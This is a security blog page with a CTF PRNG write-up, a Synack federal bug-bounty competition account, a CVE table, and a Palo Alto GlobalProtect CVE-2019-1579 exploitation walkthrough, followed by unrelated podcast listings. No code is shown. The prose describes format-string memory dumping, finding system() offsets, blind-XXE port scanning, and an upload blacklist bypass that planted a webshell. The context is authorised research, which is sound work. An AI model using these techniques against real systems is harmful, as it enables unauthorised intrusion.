Last month was Defcon and with it came the usual rounds of  competitions and CTFs. With work and family I didn’t have a ton of time to dedicate to the Defcon CTF so I decided to check out the Red Team Village CTF. The challenges for the qualifier ranged pretty significantly in difficulty as well as category but a couple challenges kept me grinding. The first was the fuzzing of a custom C2 server to retrieve a crash dump, which I could never get to crash (Feel free to leave comments about the solution). The second was a two part challenge called “Seeding” in the programming category that this post is about.

Connecting to the challenge service returns the following instructions:

We are also provided with the following code snippet from the server that shows how the random string is generated and how the PRNG is seeded.

The challenge seemed pretty straight forward. With the given seed and code for generating the random string, we should be able to recover the key given enough examples. The thing that made this challenge a little different than other “seed” based crypto challenges I’ve seen is that the string is constructed using random.choice() over the key rather than just generating numbers. A little tinkering with my solution script shows that the sequence of characters generated by random.choice() varies based on the length of the parameter provided, aka the key.

This means the first objective we have is to determine the length of the key. We can pretty easily determine the minimal key length by finding the complete keyspace by sampling outputs from the service until we stop getting new characters in the oracle’s output. However, this does not account for multiples of the same character in the key. So how do we get the full length of the key? We have to leverage the determinism of the sequence generated by random. If we relate random.choice() to random.randint() we see they are actually very similar except that random.choice() just maps the next number in the random sequence to an index in the string. This means if we select a key with unique characters, we should be able to identify the sequence generated by the PRNG by noting the indexes of the generated random characters in the key. It also means these indexes, or key positions, should be consistent across keys of the same length with the same seed.

Applying this logic we create a key index map using our custom key and then apply it to the sample fourth iteration string provided by the server to reveal the positions of each character in the unknown key. Assuming the key is longer than our keyspace, we will replace any unknown characters with “_” until we deduce them from each sample string.

Now we have the ability to derive a candidate key based on the indexes we’ve mapped given our key and the provided seed. Unfortunately this alone doesn’t bring us any closer to determining the unknown key length. What happens if we change the seed? If we change the seed we get a different set of indexes and a different sampling of key characters.

In the example above, you’ll notice that no characters in our derived keys conflict. This is because we know that the key length is 10, since we generated it. What happens if we try to derive a candidate key that is not 10 characters long using the generated 4th iteration random string from a 10 character key?

It appears if the length of the key used to generate the random string is not the same length as our local key, then characters in our derived keys do not match for each index. This is great news because that means we can find the server key length by incrementing our key length from the length of our key space until our derived keys don’t conflict.

Unfortunately, this is where I got stumped during the CTF. When I looped through the different key lengths I never got matching derived keys for the server key. After pouring over my code for several hours I finally gave up and moved on to other challenges. After the CTF was over I reached out to the challenge creator and he confirmed my approach was the right one. He was also kind enough to provide me with the challenge source code so I could troubleshoot my code. Executing the python challenge server and running my solution code yielded the following output.

So what gives??? Now it works??? I chalked it up to some coding mistake I must have magically fixed and decided to go ahead and finish out the solution. The next step is to derive the full server key by sampling the random output strings from different seeds. I simply added a loop around my previous code with an exit condition when there are no more underscores (“_”) in our key array. Unfortunately when I submitted the key I got an socket error instead of the flag.

Taking a look at the server code I see the author already added debugging that I can use to troubleshoot the issue. The logs show a familiar python3 error in regards to string encoding/decoding.

Well that’s an easy fix. I’ll just run the server with python3 and we’ll be back in business. To my surprise re-running my script displays the following.

This challenge just doesn’t want to be solved. Why don’t my derived keys match-up anymore? This feels familiar. Is it possible that different versions of python affect the sequences produced by random for the same seed?

Well there ya have it. Depending on the version of python you are running you will get different outputs from random for the same seed. I’m going to assume this wasn’t intentional. Either that or the author wanted to inflict some pain on all of us late adopters 🙂 Finishing up the solution, and running the server and solution code with python3 finally gave me the flags.

Even with all of the frustration I’d say it was a very satisfying challenge and I learned something new. Feel free to download the challenge and give it a go. Shout outs to @RedTeamVillage_, @nopresearcher, and @pwnEIP for hosting the CTF and especially the challenge creator @waldoirc.

Synack – Red Vs Fed Competition 2020

Preface

Obligatory statement: This blog post is in no way affiliated, sponsored, or endorsed with/by Synack, Inc. All graphics are being displayed under fair use for the purposes of this article.

Over the last few months Synack has been running a user engagement based competition called Red vs Fed. As can be deduced from the name, the competition was focused on penetration testing Synack’s federal customers. For those of you unfamiliar with Synack, it is a crowd-sourced hacking platform with a bug bounty type payment system. Hackers (consultants) are recruited from all over the planet to perform penetration testing services through Synack’s VPN-based platform. Some of the key differences marketed by Synack between other bounty platforms are a defined payout schedule based on vulnerability type and a 48 hour triage time.

Red Vs Fed

This section is going to be a general overview of my experience participating in my first hacking competition with Synack, Red Vs Fed. At times it may come off as a diatribe so feel free to jump forward to the technical notes that follow. In order for any of this to make sense we first have to start off with the competition rules and scoring. Points were awarded per “accepted” vulnerability based on the CVSS score determined by Synack on a scale of 1-10. There were also additional multipliers added once you passed a certain number of bugs accepted. The important detail here is the word “accepted”, which means you have to pass the myriad of exceptions, loopholes, and flat-out dismissal of submitted bugs as it goes through the Synack triage process. The information behind all of these “rules” is scattered across various help pages accessible by red team members. Example of some of these written, unwritten, and observed rules that will be referenced in this section:

  1. Shared code: If a report falls within about 10 different permutations of what may be guessed as shared code/same root issue, the report will be accepted at a substantially discounted payout or forced to be combined into a single report.
  2. 24 hour rule: In the first 24 hours of a new listing, any duplicate reports will be compared by triage staff and they will choose which report they feel has the highest “quality“. This is by far the most controversial and abused “feature” as it has led to report stuffing, favoritism, and even rewards given after clear violation of the Rules of Engagement.
  3. Customer rejected: Even though vulnerability acceptance and triage is marketed as being performed internally by Synack experts within 48 hours, randomly some reports may be sent to the customer for determination of rejection.
  4. Low Impact: Depending on the listing type, age of the listing, or individual triage staff, some bugs will be marked as low impact and rejected. This rule is specific to bugs that seem to be some-what randomly accepted on targets even though they all fall into the low impact category.
  5. Dynamic Out-of-Scope: Bug types, domains, and entire targets can be taken out of scope abruptly depending on report volume. There are loopholes to this rule if you happen to find load balancers or CNAME records for the same domain targets.
  6. Target Analytics: This is a feature not a rule but it seemed fitting for this list. When a vulnerability is accepted by Synack on a target, details like the bug type and location are released to all currently enrolled on the target.

About a month into the competition I was performing some rudimentary endpoint discovery (dirsearch, Burp intruder) on one of the legacy competition targets and had a breakthrough. I got a hit on a new virtual host on a server in the target scope, i.e. a new web application. When I come across a new application, one of the first things I try to do is to tune my wordlist for the next round of endpoint enumeration. I do this using endpoints defined in the source of the page, included javascript files, and identification of common patterns in naming, e.g. prefix_word_suffix.ext. On the next round of enumeration I hit the error page below.

A bug hunter can’t ask for an easier SQL injection vulnerability, verbose error messages, the actual SQL query with database names, tables names, and column names. I whipped up a POC, (discussed further down) and starting putting together a report for the bug. After a little more recon, I was able to uncover and report a handful of additional SQLi vulns over the next couple days. While continuing to discover and “prove” SQLi  on more endpoints, I was first introduced to (5) as the entire domain was taken out of scope for SQLi. No worries, at least my bugs were submitted so no one else should be able to swoop in and cleanup my leftovers. Well not exactly, it just so happened that there was a load balancer in front of my target as well as a defined CNAME (alias) for my domain. This meant thanks to (6) another competitor saw my bugs, knew about this loophole and was able to submit an additional 5 SQLi on this aliased domain before another dynamic OOS was issued.

At this point, the race was on to report as many vulnerabilities on this new web application now that my discovery was now public to the rest of the competitors via analytics.  I managed to get in a pretty wide range of vulnerabilities on the target but they were pretty well split with the individual that was already in second place, putting him into first place. With this web application pretty well picked through I began looking for additional vhosts on new subdomains in hopes of finding similar vulnerable applications. I also began to strategize about how best to submit vulnerabilities in regards to timing and grouping given my last outcome realizing these nuances could be the difference between other competitors scooping them up, Synack taking them out of scope, or forcing reports to be combined.

A couple weeks later I caught a lucky break. I came across a couple more web applications on a different subdomain that appeared to be using the same web technologies as my previous find and hopefully similarly buggy code. As I started enumerating the targets the bugs started stacking up. This time I took a different approach. Knowing that as soon as my reports hit analytics it would be a feeding frenzy amongst the other competitors, I began queuing up reports but not submitting them. After I had exhausted all the bugs I could find, I began to submit the reports in chunks. Chunks sized close to what I expected the tolerance for Synack to issue the vulnerability class OOS but also in small enough windows that hopefully other competitors wouldn’t be able to beat me to submission by watching analytics. Thankfully, I was able to slip in all of the reports just before the entire parent domain was taken OOS by Synack.

Back to the grind… After the last barrage of vulnerability submissions I managed to get dozens of websites taken out of scope so I had to set my sights on a new target. Luckily I had managed to position myself in first place after all of the reports had been triaged.

Nothing new here, lots of recon and endpoint enumeration. I began brute-forcing vhosts on domains that were shown to host multiple web applications in an attempt to find new ones. After some time I stumbled across a new web application on a new vhost. This application appeared to have functionality broken out into 3 distinct groupings. Similar to my previous finds I came across various bug types related to access control issues, PII disclosure, and unauthorized data modification. I followed my last approach and began to line-up submissions until I had finished assessing the web application. I then began to stagger the submissions based on the groupings I had identified.

Unfortunately things didn’t go as well this time. The triage time started dragging on so I got nervous I wouldn’t be able to get all of my reports in before the target was put out of scope. I decided to go ahead and submit everything. This was a mistake. When the second group of reports hit, the triage team decided that they considered all 6 of the reports stemmed from an access control issue. They accepted a couple as (1) shared code for 10% payout, then pushed back a couple more to be combined into one report. I pleaded my case to more than one of the triage team members but was overruled. After it was all said and done they distilled dozens of vulnerabilities across over 20 endpoints into 2 reports that would count towards the competition and then put the domain OOS (5). Oh well… I was already in first so I probably shouldn’t make a big stink right?

Over the next month it would seem I was introduced to pretty much any way reports could be rejected unless it was a clear CVSS  10 (This is obviously an exaggeration but these bug types are regularly accepted on the platform).

1.   User account state modification (Self Activation/Auth Bypass, Arbitrary Account Lockout) – initially rejected, appealed it and got it accepted

2.   PII Disclosure – Rejected as  (3). Claimed as customer won’t fix

3.   User Login Enumeration on target with NIST SP 800-53 requirement – Rejected as  (3) and (4) – Even though a email submission captcha bypass was accepted on the same target… Really???

4.   Phpinfo page – Rejected as  (4) even though these are occasionally accepted on web targets

5.   Auth Bypass/Access Control issue – Endpoint behind a site’s login portal allowed for the live viewing of CC feeds – Rejected as (4) with the following

6.   Unauthenticated, On-demand reboot of network protection device – Rejected as  (3) even though the exact same vulnerability had been accepted on a previous listing literally 2 days prior with points awarded toward the competition. The dialog I had with the organizer about the issue below:

At this point it really started to feel like I was fighting a unwinnable battle against the Synack triage team. 6 of my last 8 submissions had been rejected for some reason or another and the other 2 I had to fight for. Luckily the competition would be over shortly and there were very few viable targets eligible for the competition. With 2 days remaining in the competition I was still winning by a couple bugs.

I wish I could say everything ended uneventfully 2 days later but what good Synack sob story doesn’t talk about the infamous 24 hour rule (2). To make things interesting a web target was released roughly 2 days before the end of the competition. I mention “web” because the acceptance criteria for “low impact” (4) bugs is typically lowered for these assessment types which means it could really shake up the scoreboard. Well here we go…

I approached the last target like a CTF, only 48 more hours to hopefully secure the win. Ironically, the last target had a bit of a CTF feel to it. After navigating the application a little, it became obvious that the target was a test environment that had already undergone similar pentests. It was littered with persistent XSS payloads that had been dropped from over a year prior. These “former” bugs served as red herrings as the application was no longer vulnerable to them even though the payloads persisted. I presume they also served as a time suck for many as under the 24 hour rule (1) any red teamer could win the bug if their report was deemed the “best” submission. Unfortunately however, with only a few hours into the test the target became very unstable. The server didn’t go down but it became nearly impossible to login to, regularly returning an unavailable message as if being DOS-ed. Rather than continue to fight with it I hit the sack with hopes that it would be up in the morning.

First thing in the morning I was back on it. With only 12 hours left in the 24 hr rule ( or so I thought) I needed to get some bugs submitted. I came a across an arbitrary file upload with a preview function that looked buggy.

The file preview endpoint contained an argument that specified the filename and mimetype. Modifying these parameters changed the response Content-Type and Content-Disposition (whether the response is displayed or downloaded) headers.

I got the vulnerability written up and submitted before the end of the 24 hour rule. Since persistent XSS has a higher payout and higher CVSS score on Synack, I chose this vulnerability type rather than arbitrary file upload. Several hours after my submission, an announcement was made that due to the unavailability of the application the night previous ( possible DOS) that the 24 hour rule would be extended 12 hours. Well that sux… that means I will now be competing with more reports of possibly better quality for the bug I just submitted because of the extension. Time to go look for more bugs and hopefully balance it out.

After some more trolling around, I found an endpoint that imported records into a database using a custom XML format. Features like this are prime for XXE vulnerabilities. After some testing I found it was indeed vulnerable to blind XXE. XXE bugs are very interesting because of the various exploit primitives they can provide. Depending on the XML parser implementation, the application configuration, system platform, and network connectivity, these bugs can be used for arbitrary file read, SSRF, and even RCE. The most effective way to exploit XXEs is if you have the XML specification for the object being parsed. Unfortunately, for me the documentation for the XML file format I was attacking was behind a login page that was out-of-scope. I admit I probably spent too much time on this bug as the red teamer in me wanted RCE. I could get it to download my DTD file and open files but I couldn’t get it to leak the data.

Since I couldn’t get LFI working, I used the XXE to perform a port scan on the internal server to at least ensure I could submit the bug as SSRF. I plugged in the payload to Burp Intruder and set it on its way to enumerate all the open ports.

After I got the report written up for SSRF I held off on submission in hopes I could get the arbitrary file read (LFI) to work and maybe pull off remote code execution. Unfortunately about this time the server started to get unstable again. For the second night in a row it appeared as if someone was DOS-ing the target and it was between crawling and unavailable. Again I decided to go to bed in hopes by morning it would be usable.

Bright and early I got back to it, only 18 hours left in the competition and the target was up albeit slow. I spent a couple more hours on my XXE but with no real progress. I decided to go ahead and submit before the extended 24 hour rule expired to again hopefully ensure at least a chance at winning a possible “best” report award. Unsurprisingly, a couple hours later the 24 hour rule was extended again (because of the DOS) with it ending shortly before the end of the competition. On this announcement I decided I was done. While the reason behind the extension made sense, this could effectively put the results of the competition in the hands of the triage team as they arbitrarily chose best reports for any duplicated submissions.

The competition ended and we awaited the results. Based on analytics and my report numbers I determined that the bug submission count on the new target was pretty low. As the bugs started to roll in, this theory was confirmed. There were roughly 8 or so reports after accounting for combined endpoints. My XXE got awarded as a unique finding and my persistent XSS got duped under the 24 hour rule that was extended to 48. Shocking, extra time leads to better reports.  Based on the scoreboard, the person in second must have scored every other bug on the board except 1, largely all reflective XSS. For those, familiar with Synack, this would actually be quite a feat because XSS is typically the most duped bug on the platform meaning they likely won best report for several other collisions. I’d like to say good game but certainly didn’t feel like it.

Technical Notes of Interest

The techniques used to discover and exploit most of the vulnerabilities I found are not new. That said, I did learn a few new tricks and wrote a couple new scripts that seemed worth sharing.

  • SQL Injection

SQL injections bugs were my most prevalent find in the competition. Unlike other bug bounty platforms, Synack typically requires full exploitation of vulnerabilities found for full payout. With SQL injection, typically database names, columns, tables, and table dumps are requested to “prove” exploitation rather than basic injection tests or SQL errors. While I was able to get some easy wins with sqlmap on several of the endpoints, some of the more complex queries required custom scripts to dump data from the databases. This necessity produced two new POCs I will describe below.

In my experience a large percentage of modern SQL injection bugs are blind. By blind, I’m referring to SQLi bugs that are not able to return data from the database in the request response. That said, there are also different kinds of blind SQLi. There are bugs that return error messages and those that do not ( completely blind). The first POC is an example of a HTTP GET, time-based boolean exploit for a completely blind SQL injection vulnerability on an Oracle database. The main difference between this POC and previous examples in my github repository is the following SQL query.

Copy to Clipboard

The returned table is two columns of type string and this query performs a boolean test against a supplied character limit, if the test passes, then the database will sleep for a specified timeout. The response time is then measured to verify the boolean test.

The second POC is an example of a HTTP GET, error-based boolean exploit for a partially blind SQL injection vulnerability on an Oracle database. This POC is targeting a vulnerability that can be forced to produce two different error messages.

Copy to Clipboard

The error message used for the boolean test is forced by the payload in the event that the “UTL_INADDR.get_host_name” function is disabled on the target system. Both of the POCs extract strings from the database a character at a time using the binary search algorithm below.

Copy to Clipboard
  • Remote Code Execution (Unrestricted File Upload)

Probably one of the more interesting of my findings was a file extension blacklist bypass I found for a file upload endpoint. This particular endpoint was on a ColdFusion server and appeared to have no allowedExtensions defined as I could upload almost any file types. I say almost because a small subset of extensions were blocked with the following error.

Further research found that the ability to upload arbitrary file types was allowed up until recently when someone reported it as a vulnerability and it was issued CVE-2019-7816. The patch released by Adobe created a blacklist of dangerous file extensions that could no longer be uploaded using cffile upload.

This got me thinking, where there is a blacklist, there is the possibility of a bypass. I googled around for a large file extension list and loaded it up into Burp Intruder. After burning through the list I reviewed the results to see a 500 error on the “.ashx” extension with a message indicating the content of my file was being executed. A little googling later, I replaced my file with this simple ASHX webshell from the internet and passed it a command. Bingo.

Wrap Up

Overall the competition proved to be a rewarding experience, both financially and academically. It also helped knowing that each vulnerability found was one less that could be used to attack US federal agencies. The prevailing criticism I have for the competition is that it was unfortunate that winning became more about exploiting the platform, its policies, and people more than finding vulnerabilities. In CTF this isn’t particularly unusual for newer contests which seem to forget (or not care) about the “meta” surrounding the competition itself. Hopefully, in future competitions some of the nuanced issues surrounding vulnerability acceptance and payout can be detached from the competition scoring. My total tally of vulnerabilities against Federal targets is displayed below.

Bug Type Count CVSS (Competition Metric)
SQL Injection 12 10
Access Control 8 5-9
Remote Code Execution 6 10
Persistent XSS 5 9
Authentication Bypass 2 8-9
Local File Include 2 8
Path Traversal 1 8
XXE 1 5
Rejected/Combined/Duped 16 0

On June 8th it was announced that I had taken 2nd place in the competition and won $15,000 in prize money.

Given the current global pandemic, we decided to donate the prize money to 3 organizations who focus on helping the less fortunate: Water Mission, Low Country Foodbank, and Build Up. For any of you reading this that may have a little extra in these trying times, consider donating to your local charities to support your communities.

A Year of Windows Privilege Escalation Bugs

A Year of Windows Privilege Escalation Bugs

Earlier last year I came across an article by Provadys (now Almond) highlighting several bugs they had discovered based on research by James Forshaw of Google’s Project Zero. The research focused on the exploitation of Windows elevation of privilege (EOP) vulnerabilities using NTFS junctions, hard links, and a combination of the two Forshaw coined as Windows symlinks. James also released a handy toolset to ease the exploitation of these vulnerabilities called the symbolic testing toolkit. Since they have done such an excellent job describing these techniques already, I won’t rehash their inner workings. The main purpose of this post is to showcase some of our findings and how we exploited them.

Findings

My initial target set was software covered under a bug bounty program. After I had exhausted that group I moved on to Windows services and scheduled tasks. The table below details the vulnerabilities discovered and any additional information regarding the bugs.

Vendor Arbitrary File ID Date Reported Reference Reward
(private) Write Undisclosed 04/06/2019 Hackerone 500
Ubiquiti Delete CVE-2020-8146 04/08/2019 Hackerone 667
Valve Write CVE-2019-17180 05/16/2019 Hackerone 1250
(private) Write Undisclosed 04/19/2019 Bugcrowd 600
Thales Write CVE-2019-18232 10/15/2019 ISC-Cert N/A
Microsoft Read/Write CVE-2019-1077 05/06/2019 Microsoft N/A
Microsoft Write CVE-2019-1267 05/08/2019 Microsoft N/A
Microsoft Write CVE-2019-1317 09/16/2019 Microsoft N/A

PreAuth RCE on Palo Alto GlobalProtect Part II (CVE-2019-1579)

Background

Before I get started I want to clearly state that I am in no way affiliated, sponsored, or endorsed with/by Palo Alto Networks. All graphics are being displayed under fair use for the purposes of this article.

I recently encountered several unpatched Palo Alto firewall devices during a routine red team engagement. These particular devices were internet facing and configured as Global Protect gateways. As a red teamer/bug bounty rookie, I am often asked by customers to prove the exploitability of vulnerabilities I report. With bug bounty, this will regularly be a stipulation for payment, something I don’t think is always necessary or safe in production. If a vulnerability has been proven to be exploitable by the general security community, CVE issued, and patch developed, that should be sufficient for acceptance as a finding. I digress…

The reason an outdated Palo Alto Global Protect gateway caught my eye was because of a recent blog post by DEVCORE team members Orange Tsai(@orange_8361) and Meh Chang(@mehqq_). They identified a pre-authentication format string vulnerability (CVE-2019-1579) that had been silently patched by Palo Alto a little over a year ago (June 2018). The post also provided instructions for safely checking the existence of the vulnerability as well as a generic POC exploit.

Virtual vs Physical Appliance

If you’ve made it this far, you’re probably wondering why there’s need for another blog post if DEVCORE already covered things. According to the post, “the exploitation is easy”, given you have the right offsets in the PLT and GOT, and the assumption that the stack is aligned consistently across versions. In reality however, I found that obtaining these offsets and determining the correct instance type and version to be the hard part.

Palo Alto currently markets several next generation firewall deployments, that can be broadly categorized into physical or virtual. The focus of the exploitation details in the article are based on a virtual instance, AWS in this scenario. How then do you determine whether or not the target device you are investigating is virtual or physical? In my experience, one of the easy ways is based on the IP address. Often times companies do not setup reverse DNS records for their virtual instances. If the IP/DNS belongs to a major cloud provider, then chances are it’s a virtual appliance.

If you determine that the firewall type is an AWS instance, then head over to AWS marketplace and spin up a Palo Alto VM. One of the first things you’ll notice here is that you are limited to only the newest releases of 8.0.x, 8.1.x, 9.0.x.

Don’t worry, you can actually upgrade and downgrade the firmware from the management web interface once it has been launched… if you have a valid support license for the appliance. There are some nuances however, if you launch 9.0.x, it can only be downgraded to 8.1.x. Another very important detail is to ensure you select a “m4” instance or when you downgrade to 8.x.x or the AWS instance will be unreachable and thus unusable. For physical devices, the firmware supported can be found here

Getting ahold of a valid support license varies in difficulty and price. If you are using the AWS Firewall Bundle, the license is included. If it’s a physical device, it can get complicated/expensive. If you buy the device new from an authorized reseller, you can activate a trial license. If you buy one through something like Ebay and it’s a “production” device, make sure the seller transfers the license to you otherwise you may have to pay a “recertification” fee. If you get really lucky and the device you buy happens to be a RMA-ed device, when you register it it will show as a spare and you get no trial license, you have to pay a fee to get it transferred to production, and then you have to buy a support license.

Once you have the appliance up and running with the version you want to test, you will need to install a global protect gateway on one of the interfaces. There’s a couple youtube videos out there that go over some of the installation steps but you basically just have to step your way through it until it works. Palo Alto provides some documentation that you can use as a reference if you get stuck. One of the blocking requirements is to install a SSL certificate for the Global Protect gateway. The easiest thing here is to just generate a self signed certificate and import it. A simple guide can be found here. Supposedly one can be generated on the device as well.

If you are setting up an AWS instance, you will need to change a key setting on the network interface or the global protect gateway will not be accessible. Goto the network interface that is being used for the Global Protect interface in AWS. Right click and select “Change Source/Dest Check”. Change the value to “Disabled” as shown below.

Exploitation

Alright, the vulnerable device firmware is installed and the global protect gateway is configured, we’re at the the easy part right??? Well not exactly… When you SSH into the appliance you’ll find you are in a custom restricted shell that has very limited capabilities.

In order to get those memory offsets for the exploit we need access to the sslmgr binary.  This is going to be kinda hard to pull off in a restricted shell. Previous researchers found at least one way, but it appears to have been fixed. If only there was another technique that worked, then theoretically you could download each firmware version, copy it from the device, and retrieve the offsets.

What do we do if we can’t find such a jailbreak… for every version??? Well it turns out we may be able to use some of the administrative functions of the device and the nature of the vulnerability to help us. One of the features that the limited shell provides is the ability to increase the verbosity of the logs generated by key services. It also allows you to tail the log files for each service. Given that the vulnerability is a format string bug, could we leak memory into the log and then read it out? Let’s take a look at the bug(s).

And immediately following, is the exact code we were hoping for. It must be our lucky day.

So as long as we populate those four parameters, we can pass format string operators to dump memory from the process to the log. Why is this important? This means we can dump the entire binary from memory and retrieve the offsets we need for the exploit. Before we can do that, first we need to identify the offsets to the buffers on the stack for each of our parameters. I developed a script that you can grab from Github that will locate the specified parameters on the stack and print out the associated offsets.

The script should output something like the screenshot below. Each one of these offsets points to a buffer on the stack that we control. We can now select one and populate it with whatever memory address we like and then use the %s format operator to read memory at that location.

As typically goes, there are some problems we have to work around to get accurate memory dumps. Certain bad characters will cause unintended output: \x00, \x25, and \x26.

Null bytes cause a problem because sprintf and strlen recognize a null byte as the end of a string. A work around is to use a format string to point to a null byte at a known index, e.g. %10$c.

The \x25 character breaks our dump because it represents the format string character %. We can easily escape it by using two, \x25\x25.

The \x26 character is a little trickier. The reason this character is an issue is because it is the token for splitting the HTTP parameters. Since there aren’t a prevalence of ampersands on the stack at known indexes, we just write some to a known index using %n, and then reference it whenever we encounter an address with a \x26.

Putting this all together, I modified my previous script to write a user-supplied address to the stack, deference it using the %s format operator, and then output the data at that address to the log. Wrapping this logic in a loop combined with our handling of special characters allows us to dump large chunks of memory at any readable location. You can find a MIPS version of this script on our Github and executing it should give you output that looks something like the screenshot below.

Now that we have the ability to dump arbitrary memory addresses, we can finally dump the strlen GOT and system PLT addresses we need for the exploit, easy… except, where are they??? Without the sslmgr binary how do we know what memory address to start dumping to get the binary? We have a chicken or the egg situation here and the 64 bit address space is pretty big.

Luckily for us, the restricted shell provides us one more break. If a critical service like sslmgr crashes, a stack trace and crash dump can be exported using scp. At this point I’ve gotten pretty good at crashing the service so we’ll just throw some %n format operators at arbitrary indexes.

I learned something new about IDA Pro during this endeavor. You can use it to open up ELF core dumps. Opening up the segmentation view in IDA we could finally see where the binary is being loaded in memory. Another interesting detail we noticed while debugging our payloads was that it appeared ASLR was disabled on our MIPS physical device as the binary and loaded libraries were always loaded at the same addresses.

Finally, let’s start dumping the binary so we can get our offsets. We have roughly 0x40000 bytes to dump, at approximately 4 bytes/second. Ummm, that’s going to take… days. If only there was a shortcut. All we really need are the offsets to strlen and system in the GOT and PLT.

Unfortunately, even if we knew exactly were the GOT and PLT were, there’s nothing in the GOT or PLT that indicates the function name. How then does GDB or IDA Pro resolve the function names? It uses the ELF headers. We should be able to dump the ELF headers and a fraction of the binary to resolve these locations. After an hour or two, I loaded up my memory dump into Binary Ninja, (IDA Pro refused to load my malformed ELF). Binary Ninja has proven to be invaluable when analyzing and manipulating incomplete or corrupted data.

A little bit of research on ELF reveals that the PT_DYNAMIC program header will hold a table to other sections that hold pertinent information about an executable binary. Three of which are important to us, the Symbol Table (DT_SYMTAB-06), the String Table (DT_STRTAB-05), and the Global Offset Table (DT_PLTGOT-03). The Symbol Table will list the proper order of the functions in the PLT and GOT sections. It also provides an offset into the String Table to properly identify each function name.

With the offsets to the SYMBOL and STRING tables we can properly resolve the function names in the PLT & GOT. I wrote a quick and dirty script to parse through the symbol table dump and output a reordered string table that matches the PLT. This probably could have been done using Binary Ninja’s API, but I’m a n00b. With the symbol table matched to the string table, we can now overlay this with the GOT to get the offsets we need for strlen and system. We have two options for dumping the GOT. We can either use the crash dump from earlier, or manually dump the memory using our script.

I decided to go with the crash dump to save me a little time. The listing above shows entries in the GOT that point to the PLT (0x1001xxxx addresses) and several library functions that have already been resolved. Combined with our string table we can finally pull the correct offsets for strlen and system and finalize our POC. Our POC is for the MIPS based physical Palo Alto appliance but the scripts should be useful across appliance types with minor tweaking. Wow, all done, easy right?

Important Note

While the sslmgr service has a watchdog monitor to restart the process when it crashes, if it crashes more than ~3 times in a short amount of time, it will not restart and will require a manual restartSomething to keep in mind if you are testing your shiny new exploit against a customer’s production appliance.

How remote work is impacting federal cybersecurity careers | Guest Becky Robertson

Becky Robertson joins us from Booz Allen to discuss creating remote work situations that address modern requirements but don’t sacrifice security. We discuss the ways in which COVID-19 helped the federal sector reconsider every aspect of the workflow process and what that means for future remote roles.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

0:00 - Intro 
2:21 - Cybersecurity origin story
4:58 - Changes from the early days of cybersecurity
6:24 - Staying in the same organization for 25 years
8:56 - Day-to-day work as a VP
10:56 - Security and working from home
13:18 - Technical hurdles to work remotely
15:15 - Changing the nature of work post pandemic 
16:58 - Employees working remotely 
19:04 - Security concerns when working remotely
22:55 - How to pursue a federal cybersecurity career
25:18 - Federal cybersecurity positions in demand
27:42 - Skills needed to work in federal government
29:33 - Federal skills gaps
32:05 - Career advice 
32:57 - Finding mentors 

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with  skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.

💾

Building a billion-dollar cybersecurity company | Guest Sam King

Veracode CEO Sam King is an icon in the realms of secure coding and application security, and she joins the podcast, along with Infosec CEO Jack Koziol, to discuss her cybersecurity journey, the President’s directive on software security and so, so many more topics. You really don’t want to miss this one, folks.

– Download our FREE ebook, Developing cybersecurity talent and teams: https://www.infosecinstitute.com/ebook
– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

0:00 - Intro 
3:10 - Origin story
5:05 - Ground floor of cybersecurity 
7:54 - The “aha!” moments 
12:30 - Point were you thought industry would grow
14:28 - Changes implemented at Veracode
19:52 - Nation’s approach to cybersecurity
24:10 - Federal government security 
26:25 - Government oversight 
28:14 - Secure coding practices 
31:52 - Veracode’s app security report
40:04 - How to learn web application security 
43:46 - Mistakes to avoid when applying  
47:13 - Bringing in more diverse candidates  
51:36 - Maintaining Veracode’s edge
54:25 - Advice to move into a new cybersecurity role
56:24 - Outro 

Sam King is the chief executive officer of Veracode and a recognized expert in cybersecurity, DevSecOps and business management. A founding member of Veracode, Sam has played a significant role in the company’s growth trajectory over the past 15 years, helping to mature it from a small startup to a company with a billion dollar plus valuation. Under her leadership, Veracode has been recognized with several industry distinctions including a seven-time consecutive leader in the Gartner Magic Quadrant, leader in the Forrester SAST Wave and a Gartner Peer Insights Customer Choice for Application Security. Sam has been a keynote speaker at events such as Gartner Security Summit, RSA and the Executive Women’s Forum, on topics ranging from cybersecurity to empowering women and creating diverse and resilient corporate cultures. She has been profiled in business publications such as the Huffington Post, CNNMoney, Financial Times, InfoSecurity Magazine and The Boston Globe.

Sam received her masters of science and engineering in computer and information science from University of Pennsylvania. She earned her BS in computer science from University of Strathclyde in Glasgow, Scotland, where she earned the prestigious Charles Babbage Award, awarded to the student with the highest academic achievement in the graduating class. She currently sits on the board of Progress Software. Sam is also a member of the board of trustees for the Massachusetts Technology Leadership Council, where she was a charter member of the 2030 Challenge: a Tech Compact for Social Justice in efforts to bring more diversity to the local workforce.

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with  skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.

💾

How to pick your cybersecurity career path | Guest Alyssa Miller

Alyssa Miller of S&P Global Ratings discusses the easiest pentest she ever ran on an app and the importance of diversity of hiring, not just “diversity of thought.” She also gives some of the best advice we’ve heard yet on picking your cybersecurity path.

– Download our ebook, Developing cybersecurity talent and teams: https://www.infosecinstitute.com/ebook
– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

0:00 - Intro
2:44 - Miller’s origin story
5:53 - Experiences working while at school
8:20 - Pursuing a degree
10:57 - How has cybersecurity changed?
12:58 - Coming into cybersecurity from a different perspective
13:55 - Moving to pentesting versus programming
18:52 - Penetration testing through the years
20:46 - A big change in your industry
25:27 - Specifics of a business information security officer 
29:09 - Skills for a business information security officer role
32:34 - “Cyber Defenders’ Career Guide” book
35:08 - What surprised you about writing the book?
41:46 - Equity and inclusion in cybersecurity
47:11 - Who is doing equity correctly? 
49:12 - Long term equity strategies? 
52:45 - Final cybersecurity career advice 
55:40 - Outro 

